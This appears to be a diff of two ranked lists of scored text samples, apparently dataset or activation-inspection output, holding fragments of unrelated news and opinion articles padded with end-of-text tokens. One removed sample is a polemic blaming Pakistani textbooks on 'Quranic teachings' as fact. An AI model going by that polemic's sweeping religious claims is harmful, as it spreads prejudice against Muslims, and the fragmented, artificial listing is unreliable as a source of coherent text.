Inc.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 37; Score = 309248.0 -<|begin_of_text|>Teaching a trick to a chicken increases beliefs that chickens are intelligent and can feel emotions. +The Brussels politicians said they want to stand against ‘sexist’ education by encouraging children to take an equal interest in all subjects ‘beyond gendered stereotypes’. -Learning how to train chickens changes student’s attitudes towards them, according to a new study by Susan Hazel Lisel O’Dwyer (both University of Adelaide) and Terry Ryan (Legacy Canine). The chickens were trained to do a specific task (such as pecking on a red but not green circle) in order to get food. Survey responses before and after the class show more positive attitudes after the clicker-training session. +They hope that girls will take up scientific and technical subjects while boys could take up activities such as cleaning the home. -Lead author Susan Hazel told me in an email, “I believe that the main reason for the students’ change in attitudes to chickens was that they realized chickens are smarter than they thought (they learn the colour discrimination tasks very fast) and also when you work with the different chickens you see their personalities.” +MEPs have revealed they want boys to learn about traditionally ‘female’ activities and should be taught domestic work and care at school -“Some chickens are fast and other chickens still learn quickly but just respond more slowly,” said Dr. Hazel. “It wasn’t so much of a surprise that students were more likely to believe that chickens were intelligent, are easy to teach tricks to, and that they have individual personalities. It was more surprising that this carried over to students more likely to believe chickens could experience boredom, happiness, and frustration.” +Textbooks showing old-fashioned stereotypes about male and female roles would also be thrown out of schools, under the European Parliament’ proposals. -Some of the differences are quite striking. Before the class, only 7% of students thought it would be easy to teach tricks to a chicken, but after the class this went up to 61%. Beforehand, 49% thought chickens are intelligent, but afterwards 77% agreed. Most of the students thought chickens had individual personalities before the class (84%), but this went up to 95% after. There were some gender differences, including that women gave higher ratings than men for chicken intelligence. +The suggestions were made in the report on Empowering Girls Through Education from the Parliament’s FEMM Committee on Women’s Rights and Gender Equality, with MEPs approving the proposals by 408 to 236. -Each year the chickens are named according to a theme. This time it was members of the Royal family, and the brightest chicken was one called Margaret. Students had a clicker attached to the handle of a scoop containing chicken food. When the chicken got something right, the trainer pressed the clicker (making a sound to signal to the chicken they did the right thing) and then let the chicken eat from the scoop. +The report says it 'encourages girls and boys in the education process to take an equal interest in all subjects, beyond gendered stereotypes, in particular as regards scientific and technical subjects, including boys’ learning about activities regarded as female, in areas such as domestic work and care’. -The practical class lasted for 2 hours and included time training chickens and other activities. Chickens were chosen because they are easy to care for and handle in the class – and they are unforgiving of their trainer’s mistakes. The class used a technique called shaping which involves rewarding closer and closer approximations of a task to reach the final behaviour. Students worked in pairs to practice shaping on -================================================================================ -Rank = 38; Score = 309248.0 -<|begin_of_text|>Stand to the right. Stand to the left. Slap an arm now, ya’ll. +The Brussels politicians said they want to stand against ‘sexist’ education by encouraging children to take an equal interest in all subjects ‘beyond gendered stereotypes’ -Thus goes the “James Harden Shuffle,” a defensive dance featuring minimal movement and maximal ball watching. +Another point says that schools should be guided ‘to embrace a gender perspective and gender equality, and to ensure the elimination of stereotypes and sexist distortions that textbooks and teaching materials may include in their content.' -If you’re unfamiliar with the Harden Shuffle, YouTube user How U (h/t John Ferensen of NextImpulseSports.com) has created a lengthy instructional video breaking down the ins and outs of the Houston Rockets star while he slow waltzes about the hardwood. +It added: '[This will then] encourage them also to combat this sexism in literature, film, music, games, media, advertising and other areas that can contribute decisively to changing the attitudes, behaviour and identity of girls and boys’. -Facing no shortage of material, How U managed to compile more than 11 minutes of Harden playing the kind of defense that would make a matador blush. +Portuguese socialist MEP Liliana Rodrigues, who spearheaded the proposals, said: ‘We are still living in an unequal Europe…women continue to be a prime target for discrimination and violence. I believe that school plays a fundamental role in changing this. -It’s a dance for all occasions, featuring moves such as the “Wraparound Slap-Around.” +‘[We want to] create a school culture of gender equality, critically oversee the curricula and educational materials, ensure gender equality with regard to personal and professional decisions and improve the percentage of women in positions of responsibility.’ -Screenshots via YouTube +But Leading Labour Eurosceptic MP Kate Hoey told The Daily Express: ‘I have confidence in our nation’s ability to deal with educating our own children. It is time for the EU to stop wasting money on interfering in matters that are none of their business.’<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 36; Score = 146432.0 +<|begin_of_text|>Being feminist means being vegan. You can’t be a true feminist if you’re eating meat. -If his man moves outside the paint, Harden lets him go. He’s not about to make the hike out to the perimeter. That’s for suckers. His guy doesn’t have the ball, and you can’t score without the ball. That’s just basketball. +I read this comment on Facebook and it hit a nerve with me. My first reaction was, “Why should people be telling others what to eat and what not to eat?” The more I thought about it, the more it bothered me for many reasons. -Unfortunately, Harden’s dance moves might be holding him back. +The argument is that being a feminist means addressing all forms of oppression, including oppression of animals. The animal agricultural industry exploits animals. Female animals are forced to breed through artificial or manual insemination. Their youngs are taken from them prematurely. Female chickens are debeaked and grow to be too big for their legs to carry them. Pigs are penned in cages too small for them to move. The theory is that exploitation of the female animal reproductive system is very relevant to feminists fighting against the patriarchy and fighting for human female reproductive rights. Oppression of animals should intersect with oppression of women. -Indeed, an elite player with all the offensive skills in the world can still be his team’s worst enemy, especially when things get physical in the playoffs. +When vegans or feminists make statements like mentioned above, it can come off as very Western-centric, classist, and elitist. -The Rockets face off against the Portland Trail Blazers in Game 1 of the Western Conference Quarterfinals on Sunday. Houston won three of four of their games against Portland this season but could be in for trouble if Harden brings his dancing shoes. +I’ve never felt like going vegan or vegetarian, not because I didn’t understand the plight for animal rights, but because it is something I can’t identify with. -Keep an eye out for Harden’s signature wrap-around and his equally futile “Stand and Stare” technique. His opponents know his moves and will be looking to take full advantage in this critical stage. +First and most importantly, Hmong culture is a very big part of my identity, and food is Hmong culture. We (family and friends) gather around food. Food is served at birthday parties, religious ceremonies, celebrations, and even during short visits to family. Food is part of family life. -Don’t be surprised if Harden throws out a shoulder trying to wrap up Damian Lillard. +So, why not substitute meat ingredients with vegan products? -Tweet me with your favorite Harden moves. +Our ancestors cultivated the lands of Laos, Vietnam, and China for farming and livestock. We brought our culture with us when we immigrated to the US as refugees of war after the Vietnam War. -Follow @Dr_Carson<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 39; Score = 309248.0 -<|begin_of_text|>Criticize cops involved in the G20 debacle? We can now expect to be arrested and face criminal prosecution. +Religious ceremonies, like hu plig (soul calling), require eggs and the sacrifice of chickens and roosters. Other ceremonies involve sacrificial cows, pigs, and sheep/goats. We need chicken’s blood and feathers for the New Year to create a new shrine for our xwm kab. So, how should we perform or practice our religion if we go vegan? What about the cultural custom of dieting only on boiled chicken and herbs 30 days postpartum? -Forget a civil defamation suit—two members of the Ontario Provincial Police, aided and abetted by the Crown Attorney’s office, have chosen the nuclear option, charging a Kitchener activist with criminal defamation. +Meat has always been very precious to the Hmong. We don’t waste anything, so the dishes we cook during feasts are from the meat of the animals we sacrifice for religious ceremonies. Food we eat throughout the year are leftover meat from the same animals. -(More here. Needless to say, this latest assault on the right to dissent has not received much coverage in the corporate media.) +V +================================================================================ +Rank = 37; Score = 145408.0 +<|begin_of_text|>More, faster, better, cheaper. These are the demands of our device-happy and data-centered world. Meeting these demands requires technologies for processing and storing information. Now, a significant obstacle to the development of next-generation device technologies appears to have been overcome, according to researchers from the University of Tokyo (Japan), Tokyo Institute of Technology (Japan) and Ho Chi Minh University of Pedagogy (Vietnam). -From the Waterloo Record: +Specializing in the emerging field of semiconductor spintronics, the team has become the first to report growing iron-doped ferromagnetic semiconductors working at room temperature -- a longstanding physical constraint. Doping is the practice of adding atoms of impurities to a semiconductor lattice to modify electrical structure and properties. Ferromagnetic semiconductors are valued for their potential to enhance device functionality by utilizing the spin degrees of freedom of electrons in semiconductor devices. -Dan Kellar, 29, was recently charged with two counts of defamatory libel by officers in the OPP anti-rackets squad as he left his Kitchener home on a bicycle. He was also charged with counsel to assault one of the officers. Police allege he published comments likely to injure the reputation of the officers by exposing them to hatred, contempt or ridicule, or that were designed to insult the officers. …Kellar says the officers who arrested him are from the same unit that arrested other AW@L members and activists in connection with G20-related allegations. “The cop who arrested me is the one who’s making all the arrests for conspiracy cases,” he said. He said police agents began infiltrating activist groups before the summit. The two undercover officers joined AW@L [Anti-War at Laurier, a campus peace group], but were kicked out in the spring of 2010, before the summit, because activists didn’t feel comfortable around them, he said. …The defamatory libel charges were laid against Kellar after he put out a “community alert” on AW@L’s website, peaceculture.org. Kellar learned one of the officers had been spotted in Toronto, and, “sent out the warning…’suspected infiltrator police agent spotted in Toronto,’” he said. In the posting, he made comments police allege are defamatory. +"Bridging semiconductor and magnetism is desirable because it would provide new opportunities of utilizing spin degrees of freedom in semiconductor devices," explained research leader Masaaki Tanaka, Ph.D., of the Department of Electrical Engineering & Information Systems, and Center for Spintronics Research Network, University of Tokyo. "Our approach is, in fact, against the traditional views of material design for ferromagnetic semiconductors. In our work, we have made a breakthrough by growing an iron-doped semiconductor which shows ferromagnetism up to room temperature for the first time in semiconductors that have good compatibility with modern electronics. Our results open a way to realize semiconductor spintronic devices operating at room temperature." -Here’s the Criminal Code provision, rarely invoked in this country—until now, I guess: - -298 (1) A defamatory libel is matter published, without lawful justification or excuse, that is likely to injure the reputation of any person by exposing him to hatred, contempt or ridicule, or that is designed to insult the person of or concerning whom it is published. Mode of expression (2) A defamatory libel may be expressed directly or by insinuation or irony (a) in words legibly marked on any substance; or (b) by any object signifying a defamatory libel otherwise than by words. +The researchers discuss their findings this week in Applied Physics Letters, from AIP Publishing. The researchers' maverick move challenged the prevailing theory that predicted a type of semiconductor known as "wide band gap" would be strongly ferromagnetic. Most research focuses on the wide band gap approach. "We instead chose narrow-gap semiconductors, such as indium arsenide, or gallium antimonide, as the host semiconductors," Tanaka said. This choice enabled them to obtain ferromagnetism and conserve it at room temperature by adjusting doping concentrations. -Note +Investigators have long envisioned bridging semiconductors and magnetism to create new opportunities of utilizing spin degrees of freedom and harnessing electron spin in semiconductors. But until now, ferromagnetic semiconductors have only worked under experimental conditions at extremely low, cold temperatures, typically lower than 200 K (-73oC), which is much colder than the freezing ================================================================================ -Rank = 40; Score = 309248.0 -<|begin_of_text|>I’ll live where I want when I retire. I’ll get to it later. I’ll just work in the corporate world for ten years, and then I will create a life I enjoy. I’ll do it tomorrow. +Rank = 38; Score = 143360.0 +<|begin_of_text|>Robots, too, can be bad drivers. As the world prepares for the coming future of driverless cars, there are bound to be a few accidents. Launched this summer, a trial of PostBus driverless shuttles in Sion, Switzerland was expected to continue through October 2017. Instead, one of the two shuttles hit a parked van earlier this week, sending the whole trial into a screeching halt. -How many times have we promised ourselves tomorrow only to find it never arrives? In today’s world, we often put aside our dreams for comfort, our passions for security, and we let our fears take away our power. We choose unfulfilled lives for freedom, thinking that we can always do it differently tomorrow. +Test operation momentarily stopped in Sion. Because an autonomous shuttle touched the open tailgate of a parked van in Sion on 21 September 2016, PostBus has decided to interrupt the test operation with the Smart Shuttle for the time being. Nobody got hurt. There was a minor property damage. PostBus and the vehicle manufacturers are continuing to analyse the causes of the incident and take the necessary measures. -People don’t follow their dreams because they are afraid. They are afraid of losing security. They are afraid if they do what they want, they will die. They have become comfortably numb. +The problem echoes that of previous driverless car accidents, where sensors were blind to an unusual circumstance. In February, a Google driverless car was ruled at fault in a crash, as it changed into a lane prematurely and collided with a bus that did not see it signaling. When a Tesla car on autopilot crashed and killed its owner in the United States, it sparked a Federal investigation. The Tesla crash, where the car collided with a trailer crossing the road, was likely because the car’s sensors couldn’t tell the white side of a trailer apart from the blank space of the sky, and failed to stop in time. -What should scare them is that life is short. The reality is if we don’t follow our purpose, our passions, our joys, that’s when the death begins. And the soul’s death is one hundred times worse than the body’s. +So it is with the Swiss shuttle. The slow-moving vehicles (traveling no faster than 12 mph) can carry up to 11 passengers and are monitored remotely. The crash, as it was, appears to be minor, the kind of error that would be wholly unsurprising with a student driver, yet stands out thanks to the technology involved.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 39; Score = 143360.0 +<|begin_of_text|>Women are so fed up with male entitlement that they’ve not only begun coining terms to classify it—“manspreading” or “mansplaining,” for example—but they’ve also started devising social experiments to find out what happens when women stop being polite and start acting like, well, men. -The problem is we aren’t guaranteed tomorrow. We are only guaranteed this present moment. And we are telling the Universe who we are by the actions we display in only this moment. That’s it. That’s all we have. That’s who we are. +In an unscientific (but revealing) experiment launched on Friday, Tumblr user Claire Boniface announced that whenever she received a compliment from a male stranger online, she’d agree with him rather than simply ignore the comment or accept it with a gracious “thank you.” -We also miss some of the most special moments of our lives because we think we will have time for them later. We tell ourselves that we will do the things we enjoy when we retire. We will go fishing, we will travel, create art, we will do so much…..later. But, later never comes. There is always something standing in the way. +Like many other girls and women online, Boniface was sick of getting criticized by strangers who complimented her photos and then expected a conversation in return. -So, I want to propose that we change this way of thinking. I want to propose that we encourage and inspire each other. I propose that we start a Twitter campaign now. Let’s take the world by storm. You think you have time, but right now, time has you. Let’s change this. +“If a guy messages me I usually don’t reply because most of the time they are complete strangers to me,” 18-year-old Gweneth Bateman, a British teenager who undertook the Tumblr-based social experiment, told BuzzFeed News. “When they don’t get a reply out of me it usually ends up with them calling me ‘rude’ or a ‘bitch.’ ” -Using the hashtag, #youthinkyouhavetime write your dreams, the thing you always wanted to do. But, don’t stop there. Write about the things in each day that bring you joy. Write about the things that you are saving until later. Write the name of your favorite beach. You know. The one that’s your screen saver that you promised yourself you would visit later. +So Bateman flipped the table, responding to texts about her “gorgeous eyes” with affirmations such as “Thank you, I know.” As predicted, the men on the other side of the screen failed the experiment miserably, berating her for her confidence and then retracting the compliment altogether. Bateman cites it as an example of the way men are uncomfortable “when women own their own awesomeness.” -Let’s get inspired. Let’s find a way to do them now. +In part two of the experiment, posted to her Twitter account Tuesday, Bateman said she received an equally hateful reaction from men even when she politely agreed with them. The experiment has called attention to the way women’s behavior is judged by different standards from men’s. “If you reject a compliment you’re ‘attention seeking’ but if you accept it you’re ‘vain’ so [you] really can’t win either way,” she tweeted Monday. -I also want to offer a free 15-minute Skype session to anyone who wants guidance to start living their dreams now. Because time is running out. And, +Bateman and Boniface weren’t the only women who recently went to great lengths to give men a taste of their own privilege. In November of last year, New York–based labor organizer Beth Breslaw decided that rather than intuitively moving out of the way for people in her path, she’d take a more masculine approach and continue walking, with no regard for other pedestrians. + +She got the idea from a friend who initiated the experiment after hearing that men were less likely than women to make room for others on a crowded street. The experiment was not only startling ================================================================================ -Rank = 41; Score = 307200.0 -<|begin_of_text|>Pakistani textbooks are mostly anti-Hindu & anti-Indian under the influence of Quranic teachings. +Rank = 40; Score = 142336.0 +<|begin_of_text|>Republican congresswomen appear more "feminine" than their Democrat counterparts, according to a new study by UCLA psychology researchers. -Pak Textbooks are anti-Hindu… anti-Indian… +"Female politicians with stereotypically feminine facial features are more likely to be Republican than Democrat, and the correlation increases the more conservative the lawmaker's voting record," said study author Colleen M. Carpinella, a UCLA graduate student in psychology, in an article posted to the UCLA Newsroom website. -Pakistani textbook controversy: They think something, tell different and do harrowing. +So what makes a woman "stereotypically feminine?" -“Any material considered ‘inflammatory’ or ‘discriminatory’ to religious minorities should be removed from the syllabus as the government should seriously take action on this matter”, say Salman Ali and Saira Ahmed in a co-written piece in Daily Times Pakistan. But all these dramatic write up and govt announcements come at the verge of extinction of Hindus from the Map of Pakistan! Actually, the textbook controversy & reformations etc. in Pakistan are nothing but an eyewash to prove Islam is not so bad. +Certainly, individuals are easily biased by outside factors not related to facial characteristics, including hair style, application of cosmetics, jewelry or clothing style, said Kerri Johnson, the study's senior author and an assistant professor of communication studies and psychology at UCLA. For this reason, the researchers used a computer program that was "immune to those influences." -Upendra Bharti | HENB | New Delhi | Dec 30, 2016:: On August 11, 1947, three days before the announcement of the independence of Pakistan- separated from India as two parts East and West Pakistan, the Father of the Nation Mohammad Ali Jinnah in his speech said, “You are free; you are free to go to your temples, you are free to go to your mosques or any other place of worship in this State of Pakistan. You may belong to any religion or caste or creed — that has nothing to do with the business of the State. We are starting in the days where there is no discrimination, no distinction between one community and another, no discrimination between one caste or creed and another. We are starting with this fundamental principle: that we are all citizens, and equal citizens, of one State.” +The program, called FaceGen, allows the researchers to measure more than 100 subtle dimensions including the shape of the jaw, the location of eyebrows, the placement of cheek bones, the shape of eyes and the contour of the forehead, to create a score ranging from -40 (highly male-typed) to +40 (highly female-typed). -Ridiculous. Sowing the seeds of Islamic communalism in the minds of Muslims of Indian subcontinent and through a holy war named- ‘Direct action’, Jinnah materialized the dream of Pakistan which took the lives of millions and uprooted the innocent people from their soil numerously. +For the study, the researchers had FaceGen analyze the portraits of members of the 111th House of Representatives, measuring how closely the facial features of each face approached the average for their gender. -When Pakistan was created in 1947, Hindus constituted about 16% of the population of West Pakistan+ (current Pakistan); by 2016 it is about 1.68% – the population has declined by about 90% in about 70 years. This decimation is the outcome of sustained legal and social discrimination ever since the creation of Pakistan. The situation of minority persecution in has not been stopped anyway. The overall situation of synchronized plights on Minority Hindus (mostly Dalit/ Scheduled caste and tribal categories) through physical torture, bonded labour, abduction, ransom, attack +The researchers also studied the faces of male politicians, although those findings were not as revealing, according to the authors. Republicans averaged a less masculine appearance than their Democrat counterparts -- a finding that Carpinella said may suggest that Republican men do not have to exhibit masculinity through their appearance. + +The findings for female representatives were more telling, however. Republican women rated more "extremely feminine" or more "sex-typical," according to Johnson. The connection was so strong, the press release notes, that when photos of the same politicians were shown to a batch of undergrads, the students were able to guess with very high accuracy the political affiliations of those women who had been rated most and least "sex-typical." + +When the undergraduates guessed that a politician was Republican, their judgments were 98 percent more likely to be accurate for women with the highest rankings for femininity; the accuracy of their judgments increased the more feminine the politician's face. When the undergraduates guessed that a politician was Democrat, their judgments were 58 percent less likely to be accurate for more feminine-looking women, and the accuracy of their judgments decreased the more feminine the politician's face. + +However, ================================================================================ -Rank = 42; Score = 305152.0 -<|begin_of_text|>Geography Is Dynamic. Let’s break this down a bit. +Rank = 41; Score = 141312.0 +<|begin_of_text|>Give tropical forests back to the people who live in them – and the trees will soak up your carbon for you. Above all, keep the forests out of the hands of government. So concludes a study that has tracked the fate of 80 forests worldwide over 15 years. -Geography – The study of the physical features, atmosphere, and the human-environmental interaction of the Earth. +Most tropical forests – from Himalayan hill forests to the Madagascan jungle – are controlled by local and national governments. Forest communities own and manage little more than a tenth. They have a reputation for trashing their trees – cutting them for timber or burning them to clear land for farming. In reality the opposite is true, according to Ashwini Chhatre of the University of Illinois at Urbana-Champaign. -Dynamic – Constantly changing. +Hand it over -Geography Is Dynamic. Why? Because geography is about studying the Earth, and the Earth is constantly changing. Nothing on Earth remains in a static position. The only constant on the Earth is change. Things are always changing. The rate of which things change varies from place to place. +In the first study of its kind, Chhatre and Arun Agrawal of the University of Michigan in Ann Arbor compared forest ownership with data on carbon sequestration, which is estimated from the size and number of trees in a forest. Hectare-for-hectare, they found that tropical forest under local management stored more carbon than government-owned forests. There are exceptions, says Chhatre, “but our findings show that we can increase carbon sequestration simply by transferring ownership of forests from governments to communities”. -Even within the field of geography, there is a subfield of geography that is specifically about the changes in physical geographic features. It is known as geomorphology. See video below to learn more. +One reason may be that locals protect forests best if they own them, because they have a long-term interest in ensuring the forests’ survival. While governments, whatever their intentions, usually license destructive logging, or preside over a free-for-all in which everyone grabs what they can because nobody believes the forest will last. -Geomorphology is just one example of how geography is dynamic. In fact, if you look at every subfield of geography, from tourism geography, limnology, urban geography, biogeography, environmental geography, to political geography, geomatics, and cartography. Things are always changing on the planet. All the more reason they need to be studied. And this should be the very first rule of geography. Geography Is Dynamic. It is dynamic because this earth is dynamic. +Advertisement -In teaching geography in the schools, this should be the first lesson. Geography is dynamic. Learning state capital should not be the first thing anyone learns when it comes to geography. Understanding that the Earth is dynamic is the first thing that should be learned. +The authors suggest that locals would also make a better job of managing common pastures, coastal fisheries and water supplies. They argue that their findings contradict a long-standing environmental idea, called the “tragedy of the commons”, which says that natural resources left to communal control get trashed. In fact, says Agrawal, “communities are perfectly capable of managing their resources sustainably”. -Why learn geography? Because it’s a dynamic subject. Why is it dynamic? Because Earth is a dynamic place. Things are always changing. We need to constantly study those changes. +Flawed plans -#GeographyIsDynamic +The research calls into question UN plans to pay governments to protect forests. The climate change meeting in Copenhagen in December is likely to agree on a formula for a programme called Reduced Emissions from Deforestation and Forest 